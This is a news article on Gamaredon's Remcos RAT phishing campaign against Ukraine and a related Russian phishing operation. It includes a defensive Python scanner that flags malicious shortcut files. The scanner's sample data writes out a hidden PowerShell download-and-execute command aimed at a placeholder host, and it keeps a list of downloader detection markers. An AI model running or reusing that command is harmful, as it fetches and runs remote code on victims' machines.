Organizations in Ukraine have been targeted in a recent phishing campaign, with the goal of distributing a remote access trojan known as Remcos RAT.
According to Cisco Talos researcher Guilherme Venere, the file names used in the campaign utilize Russian words related to troop movements in Ukraine as a lure. The PowerShell downloader contacts servers located in Russia and Germany to download a ZIP file containing the Remcos backdoor.
The campaign has been attributed to a Russian hacking group known as Gamaredon, which has been tracked under various monikers, including Aqua Blizzard, Armageddon, and Trident Ursa.
Gamaredon, believed to be affiliated with Russia’s Federal Security Service (FSB), has been operating since at least 2013 and is known for targeting Ukrainian organizations for espionage and data theft.
The latest campaign involves distributing Windows shortcut files compressed inside ZIP archives, disguised as Microsoft Office documents related to the ongoing Russo-Ukrainian war. These archives are believed to be sent via phishing emails.
The connection to Gamaredon is based on the use of two machines that were previously utilized by the threat actor for similar purposes.
The LNK files contain PowerShell code that downloads and executes the next-stage payload, as well as a decoy file to maintain the illusion.
The second stage involves another ZIP archive containing a malicious DLL, which is executed via DLL side-loading. The DLL decrypts and runs the final Remcos payload from encrypted files within the archive.
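The two-stage chain above (a ZIP that carries an Office-looking Windows shortcut whose embedded PowerShell fetches the next archive) is something a defender can triage at the mail gateway or sandbox before any stage runs. The following scanner is an added example and not code from the Cisco Talos report or from Gamaredon's tooling: it walks the MS-SHLLINK ShellLinkHeader and StringData layout to pull a shortcut's relative path and command-line arguments out of each `.lnk` member of a ZIP, then flags members that combine a valid shortcut with PowerShell download markers or a double extension such as `.docx.lnk`. The marker list, the file names and the sample archive are constructed for the demonstration and are not indicators from the campaign.

```python
"""Heuristic triage of ZIP archives carrying Windows shortcut (.lnk) droppers.

Added example (not from the Talos or Silent Push reports). Parses the
ShellLinkHeader and StringData sections defined in MS-SHLLINK and flags
shortcuts whose target or arguments look like a PowerShell download stage.
"""
import io
import re
import struct
import uuid
import zipfile

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Assumed markers of a PowerShell downloader stage; not taken from the report.
MARKERS = ("powershell", "downloadstring", "downloadfile", "invoke-webrequest",
           "frombase64string", "-encodedcommand", "-enc ")
OFFICE_DOUBLE_EXT = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|rtf)\.lnk$", re.IGNORECASE)


def is_lnk(data: bytes) -> bool:
    """True if the bytes begin with a valid ShellLinkHeader (size 0x4C + CLSID)."""
    if len(data) < LNK_HEADER_SIZE:
        return False
    header_size = struct.unpack_from("<I", data, 0)[0]
    return header_size == LNK_HEADER_SIZE and uuid.UUID(bytes_le=data[4:20]) == LNK_CLSID


def lnk_strings(data: bytes) -> dict:
    """Skip LinkTargetIDList/LinkInfo and return the StringData entries present."""
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:           # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    out = {}
    # StringData entries come in this fixed order, each as CountCharacters + chars.
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                     ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                     ("icon_location", HAS_ICON_LOCATION)):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        nbytes = count * 2 if unicode else count
        out[key] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252",
                                                 errors="replace")
        pos += nbytes
    return out


def scan_archive(zip_bytes: bytes) -> list:
    """One finding per .lnk member; 'suspicious' is the field to alert on."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            data = zf.read(info)
            valid = is_lnk(data)
            strings = lnk_strings(data) if valid else {}
            text = (strings.get("relative_path", "") + " " + strings.get("arguments", "")).lower()
            markers = [m for m in MARKERS if m in text]
            double_ext = bool(OFFICE_DOUBLE_EXT.search(info.filename))
            findings.append({
                "member": info.filename,
                "valid_lnk": valid,
                "relative_path": strings.get("relative_path", ""),
                "arguments": strings.get("arguments", ""),
                "markers": markers,
                "double_extension": double_ext,
                "suspicious": valid and (bool(markers) or double_ext),
            })
    return findings


def build_sample_lnk() -> bytes:
    """Constructed shortcut: header, empty IDList, NAME, RELATIVE_PATH, ARGUMENTS."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_NAME | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID.bytes_le + struct.pack("<I", flags)
    header += struct.pack("<I", 0)                       # FileAttributes
    header += b"\x00" * 24                               # Creation/Access/Write times
    header += struct.pack("<IIIHH", 0, 0, 1, 0, 0)       # FileSize, IconIndex, ShowCommand, HotKey, Reserved1
    header += struct.pack("<II", 0, 0)                   # Reserved2, Reserved3
    id_list = struct.pack("<H", 2) + b"\x00\x00"         # IDListSize=2: only the TerminalID

    def sd(s: str) -> bytes:                             # one StringData entry, UTF-16LE
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    args = "-w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
    return header + id_list + sd("Quarterly report") + sd(r"..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") + sd(args)


def build_sample_archive() -> bytes:
    """Constructed ZIP with one disguised shortcut and one benign text member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.docx.lnk", build_sample_lnk())
        zf.writestr("readme.txt", "constructed benign member")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_archive(build_sample_archive()):
        print(finding)
```

The scanner only reads the shortcut; it never resolves the target or runs anything, so it is safe to run inside a gateway pipeline. Because the string offsets are derived from the header flags rather than from substring searches, a shortcut that hides `powershell.exe` in LinkInfo alone would still be missed; extending `lnk_strings` to parse the LinkInfo local base path is the natural next step for a production detector.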
This disclosure comes as Silent Push revealed a phishing campaign using website lures to gather information from Russian individuals sympathetic to Ukraine. The activity is believed to be the work of either Russian Intelligence Services or a threat actor aligned with Russia.
The campaign consists of four major phishing clusters, impersonating the U.S. Central Intelligence Agency (CIA), the Russian Volunteer Corps, and other organizations.
The phishing pages are hosted on a bulletproof hosting provider, Nybula LLC, with the threat actors relying on Google Forms and email responses to gather personal information from victims.
Silent Push noted that all the observed campaigns share similar traits and a common objective: collecting personal information from the victims who visit the sites.